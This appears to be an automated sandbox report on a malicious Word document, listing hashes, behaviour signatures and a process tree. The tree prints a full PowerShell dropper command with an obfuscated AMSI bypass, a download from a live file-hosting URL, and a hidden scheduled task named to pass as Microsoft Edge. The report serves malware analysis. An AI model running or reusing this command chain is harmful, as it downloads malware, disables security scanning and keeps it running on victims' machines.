Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/04/2024, 11:05

General

  • Target

    57fa6b0245f3a5009e57da1d0cac9466f07e61bf37db7d3c9f59eee2ce4db1e7.doc

  • Size

    385KB

  • MD5

    18889d70d5546b861c6fa4ec11126942

  • SHA1

    eef7ed8bd9bcee074e917cf295badf9ad5de936f

  • SHA256

    57fa6b0245f3a5009e57da1d0cac9466f07e61bf37db7d3c9f59eee2ce4db1e7

  • SHA512

    3c29433131e3a039eccbe459a56042e639c39700caaa2c8d7bffa7bb61021f14c8bf58ccbabb5a4a4a8fb056e5c086b13aaea7464d2c9cc6f1d74cada2cd2646

  • SSDEEP

    6144:55fBfm2t8aGhy50K+gGm7R82m4FX36pr0Ko2:5Xm2tVGhy50O7K2D9Ku

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.4sync.com/web/directDownload/nJJrbwEJ/rHb0lMWD.782eb24360173e96058a01a45c67031e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57fa6b0245f3a5009e57da1d0cac9466f07e61bf37db7d3c9f59eee2ce4db1e7.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe systeminfo; [Ref].Assembly.GetType('system.Management.Automation.'+$([Text.encoding]::Unicode.Getstring([Convert]::FromBase64string('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.encoding]::Unicode.Getstring([Convert]::FromBase64string('YQBtAHMAaQBJAG4AaQB0AeYAYQBpAGwAZQBkAA=='))),'NonPublic,static').setValue($null,$true); (New-Object system.Net.WebClient).DownloadFile('https://www.4sync.com/web/directDownload/nJJrbwEJ/rHb0lMWD.782eb24360173e96058a01a45c67031e', 'C:\Users\Public\WindowsAuthKeys.ps1'); schtasks /create /tn MicrosoftEdgeTask /st 00:00 /du 9999:59 /sc once /ri 10 /f /tr 'powershell.exe -Windowstyle hidden -executionPolicy Bypass -File "C:\Users\Public\WindowsAuthKeys.ps1"'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\system32\systeminfo.exe
        "C:\Windows\system32\systeminfo.exe"
        3⤵
        • Gathers system information
        PID:3956
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /tn MicrosoftEdgeTask /st 00:00 /du 9999:59 /sc once /ri 10 /f /tr "powershell.exe -Windowstyle hidden -executionPolicy Bypass -File C:\Users\Public\WindowsAuthKeys.ps1"
        3⤵
        • Creates scheduled task(s)
        PID:5000

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ijdodz0n.jkf.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1720-504-0x00007FFAB3AC0000-0x00007FFAB4581000-memory.dmp

          Filesize

          10.8MB

        • memory/1720-500-0x000001AAAF430000-0x000001AAAF440000-memory.dmp

          Filesize

          64KB

        • memory/1720-498-0x000001AAAF430000-0x000001AAAF440000-memory.dmp

          Filesize

          64KB

        • memory/1720-497-0x00007FFAB3AC0000-0x00007FFAB4581000-memory.dmp

          Filesize

          10.8MB

        • memory/1720-492-0x000001AAAF3D0000-0x000001AAAF3F2000-memory.dmp

          Filesize

          136KB

        • memory/1800-9-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-21-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-6-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-0-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-10-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-12-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-13-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-11-0x00007FFAA0210000-0x00007FFAA0220000-memory.dmp

          Filesize

          64KB

        • memory/1800-14-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-15-0x00007FFAA0210000-0x00007FFAA0220000-memory.dmp

          Filesize

          64KB

        • memory/1800-16-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-17-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-18-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-20-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-19-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-8-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-22-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-23-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-7-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-5-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-4-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-3-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-2-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-1-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-510-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-511-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-512-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB

        • memory/1800-531-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-532-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-533-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-534-0x00007FFAA26F0000-0x00007FFAA2700000-memory.dmp

          Filesize

          64KB

        • memory/1800-535-0x00007FFAE2670000-0x00007FFAE2865000-memory.dmp

          Filesize

          2.0MB